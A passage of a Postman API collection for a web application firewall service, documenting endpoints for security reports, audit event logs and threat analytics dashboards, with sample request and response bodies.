\"schedule_info\": {\n        \"timezone\": 480,\n        \"repeat\": \"manually\"\n    },\n    \"last_run_time\": \"--\",\n    \"next_run_time\": \"--\"\n}"}],"_postman_id":"d848326b-1365-4a8d-a4c8-01ce36f98f01"},{"name":"Run Report","id":"1104dac9-a8a1-419a-94e7-7a1205b2d0e9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"report_id\": \"{{report_id}}\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/security_reports/run","description":"<p>Run report immediately in background. Generated report will be sent to recipients once finished.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports","run"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"06b2e63f-5cd1-47fe-9882-2b9984172956","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"report_id\": \"6a1ce2b2-b8fd-11ea-954f-d63461e01797\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/security_reports/run"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Report was generated and sent out successfully.\"\n}"}],"_postman_id":"1104dac9-a8a1-419a-94e7-7a1205b2d0e9"},{"name":"Download Report","id":"4ae0cf84-8b8d-4288-a029-1865652a6c8b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/security_reports/run?report_id={{report_id}}","description":"<p>Run report immediately and download the generated report as PDF. Response is base64 encoded string of PDF file.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports","run"],"host":["api","tim","waasonline","com"],"query":[{"key":"report_id","value":"{{report_id}}"}],"variable":[]}},"response":[{"id":"13380825-ba4c-4299-a45e-568553ba6862","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/security_reports/run?report_id=5f0774d6-b8ef-11ea-b496-5ad898b1340f","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","security_reports","run"],"query":[{"key":"report_id","value":"5f0774d6-b8ef-11ea-b496-5ad898b1340f"}]}},"code":200,"_postman_previewlanguage":"Text","header":[{"key":"content-type","value":"application/pdf","description":"","type":"text"},{"key":"content-disposition","value":"attachment; filename='test_report'; filename*=UTF-8''test_report","description":"","type":"text"}],"cookie":[],"responseTime":null,"body":""}],"_postman_id":"4ae0cf84-8b8d-4288-a029-1865652a6c8b"},{"name":"Activate/Deactivate Report Schedule","id":"23558338-44ee-4045-a8ac-6f57bf82188d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"action\": \"activate|deactivate\"\r\n    \"report_id\": \"{{report_id}}\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/security_reports/turn_schedule","description":"<p>Deactivate a report means to pause the schedule, while activate a report means to recover the schedule.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports","turn_schedule"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"0b0b566e-220e-4cac-a54b-6d2f3d692511","name":"Success - Deactivate Report","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"action\": \"deactivate\"\r\n    \"report_id\": \"6a1ce2b2-b8fd-11ea-954f-d63461e01797\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/security_reports/turn_schedule"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\r\n    \"message\": \"The operation was successful.\"\r\n}"},{"id":"669c9b28-1625-41bc-8f26-ba48fc66cb9a","name":"Success - Activate Report","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{    \r\n    \"action\": \"activate\",\r\n    \"report_id\": \"6a1ce2b2-b8fd-11ea-954f-d63461e01797\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/security_reports/turn_schedule"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The operation was successful.\"\n}"}],"_postman_id":"23558338-44ee-4045-a8ac-6f57bf82188d"}],"id":"265415d9-e0f5-46ea-ab38-d1a00b8286fc","description":"<p>This section shows how to get and refresh reports information.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"ccc77725-97e8-4118-a532-092d76782781"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"282f46da-2612-44d4-a464-3e48e0a0f3b6"}}],"_postman_id":"265415d9-e0f5-46ea-ab38-d1a00b8286fc"},{"name":"Audit Logs","item":[{"name":"Get Event Log","id":"7dc4eda3-5e44-45b9-b7de-41640f47f2fd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman.","key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/elog?page={{page}}&size={{size}}&filter={{filter}}","description":"<p>Fetch event log.</p>\n","urlObject":{"protocol":"https","path":["v1","elog"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>An integer, log numbers in one page. The maximum value is 200.</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>An integer, the page number. The value shall be less than 10000/size. For example, if the size is 200, then page number shall not exceed 500.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>Array like string. Each element shall be JSON like object. \nBasic structure is [{\"id\":\"{log_field_name}\",\"logic\":{\"is\":{\"string\":true},\"NOT\":{1 or None},\"RANGE\":{1 or None} },\"value\":[\"{field_value_1}\", \"field_value_2\"]}]. \nAdd NOT:1 to exclude given values. Add RANGE:1 to tell that the given filter value is range type (at least two values). Value is an array containing multiple values. The logic between these values is OR logic.</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[]}},"response":[{"id":"769822b0-315b-44a3-b95d-bc4859874e37","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/elog?page=1&size=20&filter=[]","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","elog"],"query":[{"key":"page","value":"1"},{"key":"size","value":"20"},{"key":"filter","value":"[]"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 Jul 2019 09:18:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"4802"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"59b777a5-9caa-11e9-b866-2fa9aec06016"},{"key":"Access-Control-Allow-Origin","value":"https://www.timwebcloudmgt.com"},{"key":"x-amz-apigw-id","value":"cMInjGY7yQ0FrJw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d1b2163-1179b7e7b3e548ccdcfd5e0f;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"total\": 1018,\n    \"hits\": [\n        {\n            \"_id\": \"55893de4-10a5-410a-a06f-a2963a5671f5\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058949118,\n            \"level\": \"INFO\",\n            \"body\": \"[uid: 906203]Global setting change success.\"\n        },\n        {\n            \"_id\": \"66d979b2-8d3e-4e32-bc86-a3de42fb3970\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058582554,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, Invalid Certificate or Private Key. .\"\n        },\n        {\n            \"_id\": \"5f8fc929-7d8f-431c-9e4c-b482dce286d9\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058528411,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, Invalid Certificate or Private Key. .\"\n        },\n        {\n            \"_id\": \"1065a659-2930-4934-afc8-f9a72be53ab8\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058449546,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, Invalid Certificate or Private Key. .\"\n        },\n        {\n            \"_id\": \"513db7f3-5db2-4556-a32d-7fd7ae830462\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058404773,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, Invalid Certificate or Private Key. .\"\n        },\n        {\n            \"_id\": \"5ebc82b7-acc4-448c-81af-fc8494d8da1b\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058355532,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, Invalid Certificate or Private Key. .\"\n        },\n        {\n            \"_id\": \"4042c755-20bc-4068-882e-96f5021ceb78\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562058112713,\n            \"level\": \"INFO\",\n            \"body\": \"User log in from IP 60.247.121.226\"\n        },\n        {\n            \"_id\": \"3c564456-c17f-477a-b1b3-8d3acb320d70\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562057577855,\n            \"level\": \"INFO\",\n            \"body\": \"User log in from IP 96.45.36.243\"\n        },\n        {\n            \"_id\": \"7b7487fe-b2d0-440d-baa2-64921144b4cb\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562057057164,\n            \"level\": \"INFO\",\n            \"body\": \"[uid: 906203]Global setting change success.\"\n        },\n        {\n            \"_id\": \"008e2aae-9086-4b17-8839-1387839ecc4b\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056841712,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, Invalid Certificate or Private Key. .\"\n        },\n        {\n            \"_id\": \"f86ffb47-2072-4592-ac16-e374554bff67\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056812359,\n            \"level\": \"INFO\",\n            \"body\": \"[uid: 906203]Global setting change success.\"\n        },\n        {\n            \"_id\": \"854fb6c9-4fb5-41ae-967a-b56f3c3f9e1a\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056776446,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, cert_check() takes 2 positional arguments but 3 were given .\"\n        },\n        {\n            \"_id\": \"66a6b658-7a7f-4df8-be63-77f4a2f926a7\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056649513,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, name 'port' is not defined .\"\n        },\n        {\n            \"_id\": \"e0a1b6b1-3f4a-4e99-9b40-48e1aceae2e6\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056622031,\n            \"level\": \"INFO\",\n            \"body\": \"Global setting change change failed, name 'port' is not defined .\"\n        },\n        {\n            \"_id\": \"ba9a3558-537c-49ea-8351-73c9f49eaa84\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056589105,\n            \"level\": \"INFO\",\n            \"body\": \"User log in from IP 96.45.36.243\"\n        },\n        {\n            \"_id\": \"c45e89bd-ad12-4f0d-8c9e-30c7b5f93e2e\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562056573325,\n            \"level\": \"INFO\",\n            \"body\": \"User log in from IP 60.247.121.226\"\n        },\n        {\n            \"_id\": \"68b6d9ba-8a43-4e0d-807a-36ef888d9144\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562055075275,\n            \"level\": \"INFO\",\n            \"body\": \"User log in from IP 60.247.121.226\"\n        },\n        {\n            \"_id\": \"daef5842-49e8-488d-a006-2823b53d627f\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"NULL\",\n            \"timestamp\": 1562055021758,\n            \"level\": \"INFO\",\n            \"body\": \"User log in from IP 96.45.36.243\"\n        },\n        {\n            \"_id\": \"ea442df2-89a7-4a48-abf5-a81a0e09367f\",\n            \"user_id\": \"a8aebf72-923f-11e9-8a51-96ca9a4bb2e2\",\n            \"username\": \"xwwang@example.com\",\n            \"app_name\": \"XW_bbc\",\n            \"timestamp\": 1562054429172,\n            \"level\": \"INFO\",\n            \"body\": \"Endpoints of XW_bbc updated\"\n        },\n        {\n            \"_id\": \"90b01baa-8dfc-42bd-bdaf-cfdc69289b91\",\n            \"user_id\": \"906203\",\n            \"username\": \"testuser00108@163.com\",\n            \"app_name\": \"test1\",\n            \"timestamp\": 1562053271838,\n            \"level\": \"INFO\",\n            \"body\": \"timwebManager menu changed successfully\"\n        }\n    ]\n}"}],"_postman_id":"7dc4eda3-5e44-45b9-b7de-41640f47f2fd"}],"id":"1de8e9c6-82dd-42e1-84e6-dcdda8c356eb","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"79ec722f-391b-4da1-a151-1797e9b09707"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"2ec74698-36ac-4328-aff1-65c19a549616"}}],"_postman_id":"1de8e9c6-82dd-42e1-84e6-dcdda8c356eb","description":""},{"name":"Threat Analytics","item":[{"name":"Get Threat Analytics Dashboard Data","id":"6b0456e6-ef9c-4094-8c9e-f42489e829fd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id={{widget_id}}&action={{action}}&time_range={{timerange}}&host={{host}}","description":"<p>Get the global setting configurations.</p>\n","urlObject":{"protocol":"https","path":["v1","threat_analytics","dashboard"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>widget names. Could be one of threats_timeline, incidents_timeline, srccountry, attack_type, high_risk or http_host</p>\n","type":"text/plain"},"key":"widget_id","value":"{{widget_id}}"},{"description":{"content":"<p>Filtered by action values, could be all, block or monitor.</p>\n","type":"text/plain"},"key":"action","value":"{{action}}"},{"key":"time_range","value":"{{timerange}}"},{"key":"host","value":"{{host}}"}],"variable":[]}},"response":[{"id":"c7468fd2-2c52-464e-accc-36b8f4d391a4","name":"Success for Incidents Timeline","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id=incidents_timeline&action=all&time_range=7d&host=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","dashboard"],"query":[{"key":"widget_id","value":"incidents_timeline"},{"key":"action","value":"all"},{"key":"time_range","value":"7d"},{"key":"host","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"start\": 1649888460000,\n    \"end\": 1652480460000,\n    \"line_data\": [\n        {\n            \"line_name\": \"High\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 2,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 2,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 2,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 3,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 3,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 1,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 2,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 3,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 0,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 0,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 0,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        },\n        {\n            \"line_name\": \"Moderate\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 0,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 1,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 0,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 0,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 0,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 0,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 0,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 0,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 1,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 1,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 1,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        },\n        {\n            \"line_name\": \"Low\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 0,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 0,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 0,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 0,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 0,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 0,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 0,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 0,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 0,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 0,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 0,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        }\n    ]\n}"},{"id":"8234ed1e-7a6e-42e1-8aee-b5922ade97a0","name":"Success for Threats Timeline","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id=threats_timeline&action=all&time_range=7d&host=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","dashboard"],"query":[{"key":"widget_id","value":"threats_timeline"},{"key":"action","value":"all"},{"key":"time_range","value":"7d"},{"key":"host","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"start\": 1649888460000,\n    \"end\": 1652480460000,\n    \"line_data\": [\n        {\n            \"line_name\": \"Threats\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 1813,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 1620,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 64,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 1621,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 316,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 3715,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 13,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 61,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 1,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 2,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 1,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        },\n        {\n            \"line_name\": \"Blocked\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 0,\n                    \"time\": 1649888460000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 1813,\n                    \"time\": 1650018060000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 1573,\n                    \"time\": 1650147660000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 22,\n                    \"time\": 1650277260000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 1398,\n                    \"time\": 1650406860000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 252,\n                    \"time\": 1650536460000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 3715,\n                    \"time\": 1650666060000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 8,\n                    \"time\": 1650795660000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1650925260000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 26,\n                    \"time\": 1651054860000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 0,\n                    \"time\": 1651184460000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 0,\n                    \"time\": 1651314060000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651443660000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651573260000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 1,\n                    \"time\": 1651702860000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 2,\n                    \"time\": 1651832460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651962060000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 1,\n                    \"time\": 1652091660000\n                },\n                {\n                    \"id\": 19,\n                    \"value\": 0,\n                    \"time\": 1652221260000\n                },\n                {\n                    \"id\": 20,\n                    \"value\": 0,\n                    \"time\": 1652350860000\n                },\n                {\n                    \"id\": 21,\n                    \"value\": 0,\n                    \"time\": 1652480460000\n                }\n            ]\n        }\n    ]\n}"},{"id":"b6090123-fe1f-40b5-945e-81943bf08ff3","name":"Success for Top Incidents by Country","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id=srccountry&action=all&time_range=7d&host=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","dashboard"],"query":[{"key":"widget_id","value":"srccountry"},{"key":"action","value":"all"},{"key":"time_range","value":"7d"},{"key":"host","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"name\": \"United States\",\n        \"value\": 119\n    },\n    {\n        \"name\": \"India\",\n        \"value\": 83\n    },\n    {\n        \"name\": \"Russian Federation\",\n        \"value\": 35\n    },\n    {\n        \"name\": \"United Kingdom\",\n        \"value\": 23\n    },\n    {\n        \"name\": \"Japan\",\n        \"value\": 18\n    },\n    {\n        \"name\": \"Canada\",\n        \"value\": 9\n    },\n    {\n        \"name\": \"Republic of Korea\",\n        \"value\": 4\n    }\n]"},{"id":"db29190b-aced-4941-9eed-2734da1bb55d","name":"Success for Top Incidents by Attack Types","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id=attack_type&action=all&time_range=7d&host=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","dashboard"],"query":[{"key":"widget_id","value":"attack_type"},{"key":"action","value":"all"},{"key":"time_range","value":"7d"},{"key":"host","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"name\": \"Illegal OpenAPI Requests(Machine Learning)\",\n        \"percentage\": 42.9\n    },\n    {\n        \"name\": \"Anomaly Detection\",\n        \"percentage\": 42.9\n  